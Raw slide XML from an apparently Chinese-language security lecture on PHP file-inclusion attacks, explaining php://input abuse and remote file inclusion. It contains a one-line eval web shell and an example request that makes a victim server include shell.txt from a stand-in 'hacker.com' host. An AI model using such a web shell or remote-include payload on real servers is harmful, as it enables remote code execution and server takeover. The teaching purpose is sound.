            <p:cNvPr id="13" name="组合 12"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2360923" y="4242600"/>
              <a:ext cx="10945216" cy="3046095"/>
              <a:chOff x="4933525" y="1762219"/>
              <a:chExt cx="10945216" cy="3046095"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="14" name="六边形 13"/>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7"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6935633" y="1762219"/>
                <a:ext cx="8943108"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2. </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通过</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN"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伪协议</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进行包含</a:t>
                </a:r>
                <a:endPar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中，如果</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和</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allow_url_include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同时开启的情况下，</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" u="sng"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include</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等函数支持从</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN"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伪协议中的</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN"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php://input</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:highlight>
                      <a:srgbClr val="FFFF00"/>
                    </a:highlight>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                    <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>处获取输入流</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，关于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伪协议的相关知识会在下面讨论，这里只关注其中的</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php://input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php://input</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                    <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>可以</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="2400" u="sng" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                    <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>访问请求的原始数据的只读流</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                    <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>，也就是通过</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2400" u="sng" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                    <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>POST</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                    <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>方式发送的内容。</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                    <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>借助</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                    <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>PHP</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                    <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>伪协议，攻击者直接将想要在服务器上执行的恶意代码通过</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                    <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>POST</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                    <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>的方式发送给服务器就能完成攻击</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p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1028775" y="513328"/>
            <a:ext cx="11089232" cy="2306955"/>
            <a:chOff x="2360923" y="2265679"/>
            <a:chExt cx="11089232" cy="2306955"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9" name="组合 8"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2360923" y="2265679"/>
              <a:ext cx="11089232" cy="2306955"/>
              <a:chOff x="4933525" y="1918611"/>
              <a:chExt cx="11089232" cy="2306955"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="六边形 9"/>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1918611"/>
                <a:ext cx="9038489"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457200" indent="-457200">
                  <a:buAutoNum type="arabicPeriod"/>
                </a:pP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包含攻击者服务器上的恶意文件</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由于</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与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allow_url_include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是开启的，攻击者可以</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将包含恶意代码的文件</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">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放在自己的服务器上</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，例如一个内容为</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">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&lt;?</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">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php</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">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 </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">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eval</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="75000"/>
                        <a:lumOff val="25000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:highlight>
                      <a:srgbClr val="FFFF00"/>
                    </a:highlight>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                    <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>($_POST[‘pass’]);?&gt;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文件，</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构造恶意请求</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http://www.victim.com/index.php</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                    <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>?func=http://www.hacker.com/shell.txt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中的恶意代码就会在目标服务器上执行。</a:t>
                </a:r>
                <a:endPar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在下面这个</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数据包中，</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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0050A3"/>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($_POST[‘pass’]);</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就是</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php://input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所获取到的内容。</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6767" y="2320181"/>
            <a:ext cx="1113444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10199</Words>
  <Application>WPS 演示</Application>
  <PresentationFormat>自定义</PresentationFormat>
  <Paragraphs>401</Paragraphs>
  <Slides>37</Slides>
  <Notes>37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宋体</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Narrow</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3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-02-21T13:09:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-30T07:41:03Z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D18413BC566941FBAA79A43D14E76769</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-11.1.0.11744</vt:lpwstr>
  </property>
</Properties>
</file>